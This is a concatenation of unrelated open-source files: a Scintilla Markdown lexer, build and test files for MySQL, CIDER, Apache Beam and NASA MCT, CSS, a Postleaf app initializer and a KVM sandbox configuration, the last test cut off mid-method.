\n#include \n#include \n#include \n#include \n\n#include \"ILexer.h\"\n#include \"Scintilla.h\"\n#include \"SciLexer.h\"\n\n#include \"WordList.h\"\n#include \"LexAccessor.h\"\n#include \"Accessor.h\"\n#include \"StyleContext.h\"\n#include \"CharacterSet.h\"\n#include \"LexerModule.h\"\n\nusing namespace Scintilla;\n\nstatic inline bool IsNewline(const int ch) {\n return (ch == '\\n' || ch == '\\r');\n}\n\n// True if can follow ch down to the end with possibly trailing whitespace\nstatic bool FollowToLineEnd(const int ch, const int state, const Sci_PositionU endPos, StyleContext &sc) {\n Sci_PositionU i = 0;\n while (sc.GetRelative(++i) == ch)\n ;\n // Skip over whitespace\n while (IsASpaceOrTab(sc.GetRelative(i)) && sc.currentPos + i < endPos)\n ++i;\n if (IsNewline(sc.GetRelative(i)) || sc.currentPos + i == endPos) {\n sc.Forward(i);\n sc.ChangeState(state);\n sc.SetState(SCE_MARKDOWN_LINE_BEGIN);\n return true;\n }\n else return false;\n}\n\n// Set the state on text section from current to length characters,\n// then set the rest until the newline to default, except for any characters matching token\nstatic void SetStateAndZoom(const int state, const Sci_Position length, const int token, StyleContext &sc) {\n sc.SetState(state);\n sc.Forward(length);\n sc.SetState(SCE_MARKDOWN_DEFAULT);\n sc.Forward();\n bool started = false;\n while (sc.More() && !IsNewline(sc.ch)) {\n if (sc.ch == token && !started) {\n sc.SetState(state);\n started = true;\n }\n else if (sc.ch != token) {\n sc.SetState(SCE_MARKDOWN_DEFAULT);\n started = false;\n }\n sc.Forward();\n }\n sc.SetState(SCE_MARKDOWN_LINE_BEGIN);\n}\n\n// Does the previous line have more than spaces and tabs?\nstatic bool HasPrevLineContent(StyleContext &sc) {\n Sci_Position i = 0;\n // Go back to the previous newline\n while ((--i + (Sci_Position)sc.currentPos) >= 0 && !IsNewline(sc.GetRelative(i)))\n ;\n while ((--i + (Sci_Position)sc.currentPos) >= 0) {\n if (IsNewline(sc.GetRelative(i)))\n break;\n if (!IsASpaceOrTab(sc.GetRelative(i)))\n return true;\n }\n return false;\n}\n\nstatic bool AtTermStart(StyleContext &sc) {\n return sc.currentPos == 0 || sc.chPrev == 0 || isspacechar(sc.chPrev);\n}\n\nstatic bool IsValidHrule(const Sci_PositionU endPos, StyleContext &sc) {\n int count = 1;\n Sci_PositionU i = 0;\n for (;;) {\n ++i;\n int c = sc.GetRelative(i);\n if (c == sc.ch)\n ++count;\n // hit a terminating character\n else if (!IsASpaceOrTab(c) || sc.currentPos + i == endPos) {\n // Are we a valid HRULE\n if ((IsNewline(c) || sc.currentPos + i == endPos) &&\n count >= 3 && !HasPrevLineContent(sc)) {\n sc.SetState(SCE_MARKDOWN_HRULE);\n sc.Forward(i);\n sc.SetState(SCE_MARKDOWN_LINE_BEGIN);\n return true;\n }\n else {\n sc.SetState(SCE_MARKDOWN_DEFAULT);\n\t\treturn false;\n }\n }\n }\n}\n\nstatic void ColorizeMarkdownDoc(Sci_PositionU startPos, Sci_Position length, int initStyle,\n WordList **, Accessor &styler) {\n Sci_PositionU endPos = startPos + length;\n int precharCount = 0;\n bool isLinkNameDetecting = false;\n // Don't advance on a new loop iteration and retry at the same position.\n // Useful in the corner case of having to start at the beginning file position\n // in the default state.\n bool freezeCursor = false;\n\n StyleContext sc(startPos, length, initStyle, styler);\n\n while (sc.More()) {\n // Skip past escaped characters\n if (sc.ch == '\\\\') {\n sc.Forward();\n continue;\n }\n\n // A blockquotes resets the line semantics\n if (sc.state == SCE_MARKDOWN_BLOCKQUOTE)\n sc.SetState(SCE_MARKDOWN_LINE_BEGIN);\n\n // Conditional state-based actions\n if (sc.state == SCE_MARKDOWN_CODE2) {\n if (sc.Match(\"``\") && sc.GetRelative(-2) != ' ') {\n sc.Forward(2);\n sc.SetState(SCE_MARKDOWN_DEFAULT);\n }\n }\n else if (sc.state == SCE_MARKDOWN_CODE) {\n if (sc.ch == '`' && sc.chPrev != ' ')\n sc.ForwardSetState(SCE_MARKDOWN_DEFAULT);\n }\n /* De-activated because it gets in the way of other valid indentation\n * schemes, for example multiple paragraphs inside a list item.\n // Code block\n else if (sc.state == SCE_MARKDOWN_CODEBK) {\n bool d = true;\n if (IsNewline(sc.ch)) {\n if (sc.chNext != '\\t') {\n for (int c = 1; c < 5; ++c) {\n if (sc.GetRelative(c) != ' ')\n d = false;\n }\n }\n }\n else if (sc.atLineStart) {\n if (sc.ch != '\\t' ) {\n for (int i = 0; i < 4; ++i) {\n if (sc.GetRelative(i) != ' ')\n d = false;\n }\n }\n }\n if (!d)\n sc.SetState(SCE_MARKDOWN_LINE_BEGIN);\n }\n */\n // Strong\n else if (sc.state == SCE_MARKDOWN_STRONG1) {\n if (sc.Match(\"**\") && sc.chPrev != ' ') {\n sc.Forward(2);\n sc.SetState(SCE_MARKDOWN_DEFAULT);\n }\n }\n else if (sc.state == SCE_MARKDOWN_STRONG2) {\n if (sc.Match(\"__\") && sc.chPrev != ' ') {\n sc.Forward(2);\n sc.SetState(SCE_MARKDOWN_DEFAULT);\n }\n }\n // Emphasis\n else if (sc.state == SCE_MARKDOWN_EM1) {\n if (sc.ch == '*' && sc.chPrev != ' ')\n sc.ForwardSetState(SCE_MARKDOWN_DEFAULT);\n }\n else if (sc.state == SCE_MARKDOWN_EM2) {\n if (sc.ch == '_' && sc.chPrev != ' ')\n sc.ForwardSetState(SCE_MARKDOWN_DEFAULT);\n }\n else if (sc.state == SCE_MARKDOWN_CODEBK) {\n if (sc.atLineStart && sc.Match(\"~~~\")) {\n Sci_Position i = 1;\n while (!IsNewline(sc.GetRelative(i)) && sc.currentPos + i < endPos)\n i++;\n sc.Forward(i);\n sc.SetState(SCE_MARKDOWN_DEFAULT);\n }\n }\n else if (sc.state == SCE_MARKDOWN_STRIKEOUT) {\n if (sc.Match(\"~~\") && sc.chPrev != ' ') {\n sc.Forward(2);\n sc.SetState(SCE_MARKDOWN_DEFAULT);\n }\n }\n else if (sc.state == SCE_MARKDOWN_LINE_BEGIN) {\n // Header\n if (sc.Match(\"######\"))\n SetStateAndZoom(SCE_MARKDOWN_HEADER6, 6, '#', sc);\n else if (sc.Match(\"#####\"))\n SetStateAndZoom(SCE_MARKDOWN_HEADER5, 5, '#', sc);\n else if (sc.Match(\"####\"))\n SetStateAndZoom(SCE_MARKDOWN_HEADER4, 4, '#', sc);\n else if (sc.Match(\"###\"))\n SetStateAndZoom(SCE_MARKDOWN_HEADER3, 3, '#', sc);\n else if (sc.Match(\"##\"))\n SetStateAndZoom(SCE_MARKDOWN_HEADER2, 2, '#', sc);\n else if (sc.Match(\"#\")) {\n // Catch the special case of an unordered list\n if (sc.chNext == '.' && IsASpaceOrTab(sc.GetRelative(2))) {\n precharCount = 0;\n sc.SetState(SCE_MARKDOWN_PRECHAR);\n }\n else\n SetStateAndZoom(SCE_MARKDOWN_HEADER1, 1, '#', sc);\n }\n // Code block\n else if (sc.Match(\"~~~\")) {\n if (!HasPrevLineContent(sc))\n sc.SetState(SCE_MARKDOWN_CODEBK);\n else\n sc.SetState(SCE_MARKDOWN_DEFAULT);\n }\n else if (sc.ch == '=') {\n if (HasPrevLineContent(sc) && FollowToLineEnd('=', SCE_MARKDOWN_HEADER1, endPos, sc))\n ;\n else\n sc.SetState(SCE_MARKDOWN_DEFAULT);\n }\n else if (sc.ch == '-') {\n if (HasPrevLineContent(sc) && FollowToLineEnd('-', SCE_MARKDOWN_HEADER2, endPos, sc))\n ;\n else {\n precharCount = 0;\n sc.SetState(SCE_MARKDOWN_PRECHAR);\n }\n }\n else if (IsNewline(sc.ch))\n sc.SetState(SCE_MARKDOWN_LINE_BEGIN);\n else {\n precharCount = 0;\n sc.SetState(SCE_MARKDOWN_PRECHAR);\n }\n }\n\n // The header lasts until the newline\n else if (sc.state == SCE_MARKDOWN_HEADER1 || sc.state == SCE_MARKDOWN_HEADER2 ||\n sc.state == SCE_MARKDOWN_HEADER3 || sc.state == SCE_MARKDOWN_HEADER4 ||\n sc.state == SCE_MARKDOWN_HEADER5 || sc.state == SCE_MARKDOWN_HEADER6) {\n if (IsNewline(sc.ch))\n sc.SetState(SCE_MARKDOWN_LINE_BEGIN);\n }\n\n // New state only within the initial whitespace\n if (sc.state == SCE_MARKDOWN_PRECHAR) {\n // Blockquote\n if (sc.ch == '>' && precharCount < 5)\n sc.SetState(SCE_MARKDOWN_BLOCKQUOTE);\n /*\n // Begin of code block\n else if (!HasPrevLineContent(sc) && (sc.chPrev == '\\t' || precharCount >= 4))\n sc.SetState(SCE_MARKDOWN_CODEBK);\n */\n // HRule - Total of three or more hyphens, asterisks, or underscores\n // on a line by themselves\n else if ((sc.ch == '-' || sc.ch == '*' || sc.ch == '_') && IsValidHrule(endPos, sc))\n ;\n // Unordered list\n else if ((sc.ch == '-' || sc.ch == '*' || sc.ch == '+') && IsASpaceOrTab(sc.chNext)) {\n sc.SetState(SCE_MARKDOWN_ULIST_ITEM);\n sc.ForwardSetState(SCE_MARKDOWN_DEFAULT);\n }\n // Ordered list\n else if (IsADigit(sc.ch)) {\n int digitCount = 0;\n while (IsADigit(sc.GetRelative(++digitCount)))\n ;\n if (sc.GetRelative(digitCount) == '.' &&\n IsASpaceOrTab(sc.GetRelative(digitCount + 1))) {\n sc.SetState(SCE_MARKDOWN_OLIST_ITEM);\n sc.Forward(digitCount + 1);\n sc.SetState(SCE_MARKDOWN_DEFAULT);\n }\n }\n // Alternate Ordered list\n else if (sc.ch == '#' && sc.chNext == '.' && IsASpaceOrTab(sc.GetRelative(2))) {\n sc.SetState(SCE_MARKDOWN_OLIST_ITEM);\n sc.Forward(2);\n sc.SetState(SCE_MARKDOWN_DEFAULT);\n }\n else if (sc.ch != ' ' || precharCount > 2)\n sc.SetState(SCE_MARKDOWN_DEFAULT);\n else\n ++precharCount;\n }\n\n // Any link\n if (sc.state == SCE_MARKDOWN_LINK) {\n if (sc.Match(\"](\") && sc.GetRelative(-1) != '\\\\') {\n sc.Forward(2);\n isLinkNameDetecting = true;\n }\n else if (sc.Match(\"]:\") && sc.GetRelative(-1) != '\\\\') {\n sc.Forward(2);\n sc.SetState(SCE_MARKDOWN_DEFAULT);\n }\n else if (!isLinkNameDetecting && sc.ch == ']' && sc.GetRelative(-1) != '\\\\') {\n sc.Forward();\n sc.SetState(SCE_MARKDOWN_DEFAULT);\n }\n else if (isLinkNameDetecting && sc.ch == ')' && sc.GetRelative(-1) != '\\\\') {\n sc.Forward();\n sc.SetState(SCE_MARKDOWN_DEFAULT);\n isLinkNameDetecting = false;\n }\n }\n\n // New state anywhere in doc\n if (sc.state == SCE_MARKDOWN_DEFAULT) {\n if (sc.atLineStart && sc.ch == '#') {\n sc.SetState(SCE_MARKDOWN_LINE_BEGIN);\n freezeCursor = true;\n }\n // Links and Images\n if (sc.Match(\"![\")) {\n sc.SetState(SCE_MARKDOWN_LINK);\n sc.Forward(2);\n }\n else if (sc.ch == '[' && sc.GetRelative(-1) != '\\\\') {\n sc.SetState(SCE_MARKDOWN_LINK);\n sc.Forward();\n }\n // Code - also a special case for alternate inside spacing\n else if (sc.Match(\"``\") && sc.GetRelative(3) != ' ' && AtTermStart(sc)) {\n sc.SetState(SCE_MARKDOWN_CODE2);\n sc.Forward();\n }\n else if (sc.ch == '`' && sc.chNext != ' ' && AtTermStart(sc)) {\n sc.SetState(SCE_MARKDOWN_CODE);\n }\n // Strong\n else if (sc.Match(\"**\") && sc.GetRelative(2) != ' ' && AtTermStart(sc)) {\n sc.SetState(SCE_MARKDOWN_STRONG1);\n sc.Forward();\n }\n else if (sc.Match(\"__\") && sc.GetRelative(2) != ' ' && AtTermStart(sc)) {\n sc.SetState(SCE_MARKDOWN_STRONG2);\n sc.Forward();\n }\n // Emphasis\n else if (sc.ch == '*' && sc.chNext != ' ' && AtTermStart(sc)) {\n sc.SetState(SCE_MARKDOWN_EM1);\n }\n else if (sc.ch == '_' && sc.chNext != ' ' && AtTermStart(sc)) {\n sc.SetState(SCE_MARKDOWN_EM2);\n }\n // Strikeout\n else if (sc.Match(\"~~\") && sc.GetRelative(2) != ' ' && AtTermStart(sc)) {\n sc.SetState(SCE_MARKDOWN_STRIKEOUT);\n sc.Forward();\n }\n // Beginning of line\n else if (IsNewline(sc.ch)) {\n sc.SetState(SCE_MARKDOWN_LINE_BEGIN);\n }\n }\n // Advance if not holding back the cursor for this iteration.\n if (!freezeCursor)\n sc.Forward();\n freezeCursor = false;\n }\n sc.Complete();\n}\n\nLexerModule lmMarkdown(SCLEX_MARKDOWN, ColorizeMarkdownDoc, \"markdown\");\n"} {"text": "nvkm-y += nvkm/engine/sw/base.o\nnvkm-y += nvkm/engine/sw/nv04.o\nnvkm-y += nvkm/engine/sw/nv10.o\nnvkm-y += nvkm/engine/sw/nv50.o\nnvkm-y += nvkm/engine/sw/gf100.o\n\nnvkm-y += nvkm/engine/sw/chan.o\n\nnvkm-y += nvkm/engine/sw/nvsw.o\n"} {"text": "# Tests for PERFORMANCE_SCHEMA\n\n--source include/not_embedded.inc\n--source include/have_perfschema.inc\n\n# The query result are not re producible,\n# due to variations in platforms and plugins\n# We still execute the select statement, for:\n# - code coverage\n# - make sure it does not crash\n# - valgrind coverage\n\n--disable_result_log\nselect * from performance_schema.setup_instruments;\n--enable_result_log\n\n# DEBUG_SYNC::mutex is dependent on the build (DEBUG only)\n\nselect * from performance_schema.setup_instruments\n where name like 'Wait/Synch/Mutex/sql/%'\n and name not in ('wait/synch/mutex/sql/DEBUG_SYNC::mutex')\n order by name limit 10;\n\n# CRYPTO_dynlock_value::lock is dependent on the build (SSL)\n\nselect * from performance_schema.setup_instruments\n where name like 'Wait/Synch/Rwlock/sql/%'\n and name not in ('wait/synch/rwlock/sql/CRYPTO_dynlock_value::lock')\n order by name limit 10;\n\n# COND_handler_count is dependent on the build (Windows only)\n# DEBUG_SYNC::cond is dependent on the build (DEBUG only)\n# COND_main_thread_in_use is dependent on the build (non Windows)\n# COND_start_signal_handler is dependent on the build (non Windows)\n\nselect * from performance_schema.setup_instruments\n where name like 'Wait/Synch/Cond/sql/%'\n and name not in (\n 'wait/synch/cond/sql/COND_open',\n 'wait/synch/cond/sql/COND_handler_count',\n 'wait/synch/cond/sql/DEBUG_SYNC::cond',\n 'wait/synch/cond/sql/COND_socket_listener_active',\n 'wait/synch/cond/sql/COND_start_signal_handler')\n order by name limit 10;\n\n--disable_result_log\nselect * from performance_schema.setup_instruments\n where name='Wait';\n--enable_result_log\n\n--disable_result_log\nselect * from performance_schema.setup_instruments\n where enabled='YES';\n--enable_result_log\n\n--error ER_TABLEACCESS_DENIED_ERROR\ninsert into performance_schema.setup_instruments\n set name='FOO', enabled='YES', timed='YES';\n\n--error ER_WRONG_PERFSCHEMA_USAGE\nupdate performance_schema.setup_instruments\n set name='FOO';\n\nupdate performance_schema.setup_instruments\n set enabled='NO';\n\nupdate performance_schema.setup_instruments\n set timed='NO';\n\n--disable_result_log\nselect * from performance_schema.setup_instruments;\n--enable_result_log\n\nupdate performance_schema.setup_instruments\n set enabled='YES', timed='YES';\n\n--error ER_TABLEACCESS_DENIED_ERROR\ndelete from performance_schema.setup_instruments;\n\n--error ER_TABLEACCESS_DENIED_ERROR\ndelete from performance_schema.setup_instruments\n where name like 'Wait/Synch/%';\n\nLOCK TABLES performance_schema.setup_instruments READ;\nUNLOCK TABLES;\n\nLOCK TABLES performance_schema.setup_instruments WRITE;\nUNLOCK TABLES;\n\n--echo\n--echo # Bug#13813193 ASSERTION `TABLE->READ_SET ==\n--echo # &TABLE->DEF_READ_SET' FAILED / MYSQL_UPDATE\n--echo\nUPDATE performance_schema.setup_instruments SET timed='NO'\nORDER BY RAND();\n\n# Test cleanup\n\nupdate performance_schema.setup_instruments\n set enabled='YES', TIMED='YES';\n\n"} {"text": "#root {\n height: 100%;\n}\n\n#root .ant-layout {\n height: 100%;\n}\n\n#root .logo {\n width: 100%;\n color: #fff;\n text-align: center;\n height: 60px;\n font-size: 24px;\n font-weight: 700;\n text-transform: uppercase;\n background: transparent;\n float: left;\n margin-bottom: 20px;\n border-bottom: 1px solid #232e3a;\n padding-top: 10px;\n}\n\n#root .logo > img {\n width: 31px;\n height: 31px;\n}\n\n#main {\n background-image: url(https://gw.alipayobjects.com/zos/rmsportal/TVYTbAXWheQpRcWDaDMu.svg);\n background-repeat: no-repeat;\n background-position: center 110px;\n background-size: 100%;\n}\n\n#login-top {\n text-align: center;\n}\n\n#root .ant-menu-dark.ant-menu-horizontal {\n border-bottom-color: transparent;\n}\n\n/*\n.ant-menu.ant-menu-dark .ant-menu-item-selected, .ant-menu-submenu-popup.ant-menu-dark .ant-menu-item-selected {\n background-color: #1ac09e;\n}\n*/\n.vullevel {\n width: 50%;\n}\n\n.vultype {\n width: 50%;\n}\n\n.ant-form-inline .ant-form-item {\n display: inline-block;\n margin-right: 0px;\n margin-bottom: 0;\n width: 100%;\n}\n\n.ant-form-inline .ant-form-item > .ant-form-item-control-wrapper, .ant-form-inline .ant-form-item > .ant-form-item-label {\n display: inline-block;\n vertical-align: middle;\n width: 100%;\n}\n\n/*滚动字幕*/\n.marquee {\n color: #000000;\n margin: 0 auto;\n overflow: hidden;\n white-space: nowrap;\n box-sizing: border-box;\n animation: marquee 10s linear infinite;\n}\n\n.marquee:hover {\n animation-play-state: paused\n}\n\n/* Make it move */\n@keyframes marquee {\n 0% {\n text-indent: 27.5em\n }\n 100% {\n text-indent: -105em\n }\n}"} {"text": "'use strict';\n\nmodule.exports = function(app, options) {\n options = options || {};\n\n // Globals\n global.__basedir = __dirname;\n global.__version = require('./package.json').version;\n\n // Node modules\n const BodyParser = require('body-parser');\n const Chalk = require('chalk');\n const CookieParser = require('cookie-parser');\n const Compression = require('compression');\n const DustHelpers = require('dustjs-helpers');\n const Express = require('express');\n const Path = require('path');\n const Promise = require('bluebird');\n const Slashes = require('connect-slashes');\n\n // Local modules\n const DustEngine = require(Path.join(__basedir, 'source/modules/dust_engine.js'));\n const DynamicImages = require(Path.join(__basedir, 'source/modules/dynamic_images.js'));\n const HtmlHelpers = require(Path.join(__basedir, 'source/modules/helpers/html_helpers.js'));\n const I18n = require(Path.join(__basedir, 'source/modules/i18n.js'));\n const ThemeHelpers = require(Path.join(__basedir, 'source/modules/helpers/theme_helpers.js'));\n const UtilityHelpers = require(Path.join(__basedir, 'source/modules/helpers/utility_helpers.js'));\n\n // Express app\n const AdminRouter = require(Path.join(__basedir, 'source/routers/admin_router.js'));\n const ApiRouter = require(Path.join(__basedir, 'source/routers/api_router.js'));\n const ThemeRouter = require(Path.join(__basedir, 'source/routers/theme_router.js'));\n const AuthMiddleware = require(Path.join(__basedir, 'source/middleware/auth_middleware'));\n const ViewMiddleware = require(Path.join(__basedir, 'source/middleware/view_middleware.js'));\n const ErrorController = require(Path.join(__basedir, 'source/controllers/error_controller.js'));\n\n // Database\n const Database = require(Path.join(__basedir, 'source/modules/database.js'))(options);\n app.locals.Database = Database;\n \n // Themes stored on app.locals so we can access the configured directory\n const Themes = require(Path.join(__basedir, 'source/modules/themes.js'))(options);\n app.locals.Themes = Themes;\n \n // Stash upload path on app.locals so we can access the configured directory\n app.locals.uploadPath = options.uploadPath || Path.join(__basedir, 'uploads');\n \n\n return Promise.resolve()\n // Initialize the database\n .then(() => Database.init())\n .then(() => {\n let models = Database.sequelize.models;\n\n // Generate search indexes on startup\n return Promise.all([\n models.post.buildSearchIndex(),\n models.user.buildSearchIndex(),\n models.tag.buildSearchIndex()\n ]);\n })\n // Load settings into app.locals.Settings\n .then(() => Database.loadSettings())\n .then((settings) => app.locals.Settings = settings)\n // Load navigation into app.locals.Navigation\n .then(() => Database.sequelize.models.navigation.getArray())\n .then((navigation) => app.locals.Navigation = navigation)\n // Load i18n into app.locals.I18n\n .then(() => {\n app.locals.I18n = I18n;\n return app.locals.I18n.load(app.locals.Settings.language);\n })\n // Start the app\n .then(() => {\n // App config\n app.enable('strict routing');\n app.disable('x-powered-by');\n\n // App-level middleware\n app\n .use(Slashes(false))\n .use(CookieParser())\n .use(Compression())\n .use(DynamicImages.processImages)\n .use('/assets', Express.static(Path.join(__basedir, 'assets')))\n .use('/themes', Express.static(Themes.themePath))\n .use('/uploads', Express.static(app.locals.uploadPath))\n .use(BodyParser.urlencoded({ extended: true, limit: '10mb' }))\n .use(AuthMiddleware.attachUser)\n .use(ViewMiddleware.attachViewData);\n\n // View engine\n app.engine('dust', DustEngine.engine(app, {\n cache: process.env.NODE_ENV === 'production',\n helpers: [DustHelpers, HtmlHelpers, UtilityHelpers, ThemeHelpers]\n }));\n app.set('json spaces', process.env.NODE_ENV === 'production' ? undefined : 2);\n app.set('views', [\n Path.join(Themes.themePath, app.locals.Settings.theme, 'templates'),\n Path.join(__basedir, 'source/views')\n ]);\n app.set('view engine', 'dust');\n\n // App routers\n ApiRouter(app);\n AdminRouter(app);\n ThemeRouter(app);\n\n // Error pages\n app.use(ErrorController.notFound);\n app.use(ErrorController.applicationError);\n })\n .catch((err) => {\n console.error(\n Chalk.red('Error: ') + 'Postleaf failed to initialize! 🐛\\n\\n' +\n Chalk.red(err.stack)\n );\n });\n};\n"} {"text": ";;; cider-browse-ns-tests.el\n\n;; Copyright © 2012-2016 Tim King, Bozhidar Batsov\n\n;; Author: Tim King \n;; Bozhidar Batsov \n;; Artur Malabarba \n\n;; This file is NOT part of GNU Emacs.\n\n;; This program is free software: you can redistribute it and/or\n;; modify it under the terms of the GNU General Public License as\n;; published by the Free Software Foundation, either version 3 of the\n;; License, or (at your option) any later version.\n;;\n;; This program is distributed in the hope that it will be useful, but\n;; WITHOUT ANY WARRANTY; without even the implied warranty of\n;; MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU\n;; General Public License for more details.\n;;\n;; You should have received a copy of the GNU General Public License\n;; along with this program. If not, see `http://www.gnu.org/licenses/'.\n\n;;; Commentary:\n\n;; This file is part of CIDER\n\n;;; Code:\n\n(require 'buttercup)\n(require 'cider-browse-ns)\n\n(describe \"cider-browse-ns--text-face\"\n (it \"identifies a function\"\n (expect (cider-browse-ns--text-face '(dict \"arglists\" \"fn arg list\"))\n :to-equal 'font-lock-function-name-face))\n\n (it \"identifies a macro\"\n (expect (cider-browse-ns--text-face '(dict \"arglists\" \"fn arg list\" \"macro\" \"true\"))\n :to-equal 'font-lock-keyword-face))\n\n (it \"identifies a variable\"\n (expect (cider-browse-ns--text-face '(dict))\n :to-equal 'font-lock-variable-name-face)))\n\n(describe \"cider-browse-ns\"\n :var (cider-browse-ns-buffer)\n (it \"lists out all forms of a namespace with correct font-locks\"\n (spy-on 'cider-sync-request:ns-vars-with-meta :and-return-value\n '(dict \"blank?\"\n (dict \"arglists\" \"fn arg list\"\n \"doc\" \"\\\"True if s is nil, empty, or contains only whitespace.\\\"\")))\n\n (with-temp-buffer\n (setq cider-browse-ns-buffer (buffer-name (current-buffer)))\n (cider-browse-ns \"clojure.string\")\n (search-forward \"clojure\")\n (expect (get-text-property (point) 'face) :to-equal 'font-lock-type-face)\n (search-forward \"blank\")\n (expect (get-text-property (point) 'font-lock-face) :to-equal 'font-lock-function-name-face)\n (search-forward \"True\")\n (expect (get-text-property (point) 'font-lock-face) :to-equal 'font-lock-doc-face))))\n\n(describe \"cider-browse-ns--first-doc-line\"\n (it \"returns Not documented if the doc string is missing\"\n (expect (cider-browse-ns--first-doc-line nil)\n :to-equal \"Not documented.\"))\n\n (it \"returns the first line of the doc string\"\n (expect (cider-browse-ns--first-doc-line \"True if s is nil, empty, or contains only whitespace.\")\n :to-equal \"True if s is nil, empty, or contains only whitespace.\"))\n\n (it \"returns the first sentence of the doc string if the first line contains multiple sentences\"\n (expect (cider-browse-ns--first-doc-line \"First sentence. Second sentence.\")\n :to-equal \"First sentence. \"))\n\n (it \"returns the first line of the doc string if the first sentence spans multiple lines\"\n (expect (cider-browse-ns--first-doc-line \"True if s is nil, empty, or\\n contains only whitespace.\")\n :to-equal \"True if s is nil, empty, or...\")))\n"} {"text": "/*\n * Licensed to the Apache Software Foundation (ASF) under one\n * or more contributor license agreements. See the NOTICE file\n * distributed with this work for additional information\n * regarding copyright ownership. The ASF licenses this file\n * to you under the Apache License, Version 2.0 (the\n * \"License\"); you may not use this file except in compliance\n * with the License. You may obtain a copy of the License at\n *\n * http://www.apache.org/licenses/LICENSE-2.0\n *\n * Unless required by applicable law or agreed to in writing, software\n * distributed under the License is distributed on an \"AS IS\" BASIS,\n * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n * See the License for the specific language governing permissions and\n * limitations under the License.\n */\npackage org.apache.beam.sdk.extensions.sql.impl.rel;\n\nimport java.util.HashMap;\nimport java.util.Map;\nimport org.apache.beam.sdk.Pipeline;\nimport org.apache.beam.sdk.extensions.sql.impl.BeamSqlEnv;\nimport org.apache.beam.sdk.extensions.sql.meta.BeamSqlTable;\nimport org.apache.beam.sdk.values.PCollection;\nimport org.apache.beam.sdk.values.Row;\n\n/** Base class for rel test. */\npublic abstract class BaseRelTest {\n private static Map tables = new HashMap<>();\n protected static BeamSqlEnv env = BeamSqlEnv.readOnly(\"test\", tables);\n\n protected static PCollection compilePipeline(String sql, Pipeline pipeline) {\n return BeamSqlRelUtils.toPCollection(pipeline, env.parseQuery(sql));\n }\n\n protected static void registerTable(String tableName, BeamSqlTable table) {\n tables.put(tableName, table);\n }\n\n protected static BeamSqlTable getTable(String tableName) {\n return tables.get(tableName);\n }\n}\n"} {"text": "[kvmremote]\n# Specify a comma-separated list of available machines to be used. For each\n# specified ID you have to define a dedicated section containing the details\n# on the respective machine. (E.g. machine1, machine2, machine3)\nmachines = machine1\n\n# Specify a comma-separated list of KVM hypervisors to be used. For each\n# specified ID you have to define a dedicated section containing the details\nhypervisors = hypervisor1\n\n[hypervisor1]\n# Specify connection string for hypervisor\ndsn = qemu:///system\n# Specify interface used to sniff traffic with KVM\ninterface = br0\n\n# Specify if memory dump mode is enabled, hypervisor is remote\n# (remote memory dump capability)\n# should use a ssh shared key and root user (as actions will be performed by root)\n# remote_host = root@192.168.122.1\n\n[machine1]\n# Specify the label name of the current machine as specified in your\n# physical machine configuration.\nlabel = machine1\n\n# Specify the IP address of the current machine. Make sure that the IP address\n# is valid and that the host machine is able to reach it. If not, the analysis\n# will fail.\nip = 127.0.0.1\n\n# Specify the operating system platform used by current machine\n# [windows/darwin/linux].\nplatform = windows\n\n# Specify hypervisor name for machine\nhypervisor = rex\n"} {"text": "/*******************************************************************************\r\n * Mission Control Technologies, Copyright (c) 2009-2012, United States Government\r\n * as represented by the Administrator of the National Aeronautics and Space \r\n * Administration. All rights reserved.\r\n *\r\n * The MCT platform is licensed under the Apache License, Version 2.0 (the \r\n * \"License\"); you may not use this file except in compliance with the License. \r\n * You may obtain a copy of the License at \r\n * http://www.apache.org/licenses/LICENSE-2.0.\r\n *\r\n * Unless required by applicable law or agreed to in writing, software \r\n * distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT \r\n * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the \r\n * License for the specific language governing permissions and limitations under \r\n * the License.\r\n *\r\n * MCT includes source code licensed under additional open source licenses. See \r\n * the MCT Open Source Licenses file included with this distribution or the About \r\n * MCT Licenses dialog available at runtime from the MCT Help menu for additional \r\n * information. \r\n *******************************************************************************/\r\npackage gov.nasa.arc.mct.util.ext.commands;\n\nimport gov.nasa.arc.mct.util.ext.commands.CmdProcessBuilder;\n\nimport java.util.ArrayList;\nimport java.util.List;\n\nimport org.testng.Assert;\nimport org.testng.annotations.BeforeMethod;\nimport org.testng.annotations.Test;\n\npublic class TestCmdProcessBuilder {\n \n\tprivate CmdProcessBuilder cmdProcessBuilder;\n\t\n\t@BeforeMethod\n\tvoid setup() { \n\t cmdProcessBuilder = new CmdProcessBuilder();\n\t \n\t\tSystem.setProperty(\"ExecLimitManagerPath\", \"src/test/resources/\");\n\t\tSystem.setProperty(\"ExecLimitManagerScript\", \"launchLimitMgrTest.sh\");\n\t}\n\t\n\t@Test\n\tpublic void testOSPlatformSupported() {\n\t \n\t\tAssert.assertNotNull(cmdProcessBuilder.checkOSPlatform());\n\t\t\n\t\tif (cmdProcessBuilder.isWindows()) {\n\t\t cmdProcessBuilder.setOSPlatform(\"Windows XP\");\n\t\t Assert.assertTrue(cmdProcessBuilder.isWindows());\n\t\t}\n\t\t\n\t\tif (cmdProcessBuilder.isMacOS()) {\n\t\t cmdProcessBuilder.setOSPlatform(\"Mac OS X\");\n\t\t Assert.assertTrue(cmdProcessBuilder.isMacOS());\n\t\t}\n\t\t\n\t\tif (cmdProcessBuilder.isUNIXLinux()) {\n\t\t cmdProcessBuilder.setOSPlatform(\"Linux\");\n\t\t Assert.assertTrue(cmdProcessBuilder.isUNIXLinux());\n\t\t}\n\t\t\n\t}\n\t\n\t@Test(dependsOnMethods=\"testOSPlatformSupported\")\n\tpublic void testCmdExecSuccessful() {\n\t\tfinal String PUI = \"TESTCOMMANDPUI\";\n\t\tfinal List commandList = new ArrayList();\n\t\t\n\t\tif (cmdProcessBuilder.isMacOS()) {\n\t\t Assert.assertEquals(cmdProcessBuilder.checkOSPlatform(), \"Mac OS X\");\n\t\t commandList.add(System.getProperty(\"ExecLimitManagerScript\") + \" \" + PUI);\n\t\t} else if (cmdProcessBuilder.isUNIXLinux()) {\n\t\t commandList.add(System.getProperty(\"ExecLimitManagerScript\") + \" \" + PUI);\n\t\t}\n\t\t\n\t\tif (cmdProcessBuilder.isMacOS() || cmdProcessBuilder.isUNIXLinux()) {\n\t\t Assert.assertTrue(cmdProcessBuilder.execMultipleCommands(System.getProperty(\"ExecLimitManagerPath\"), commandList));\n\t\t}\n\t}\n\t\n\t@Test(dependsOnMethods=\"testOSPlatformSupported\")\n\tpublic void 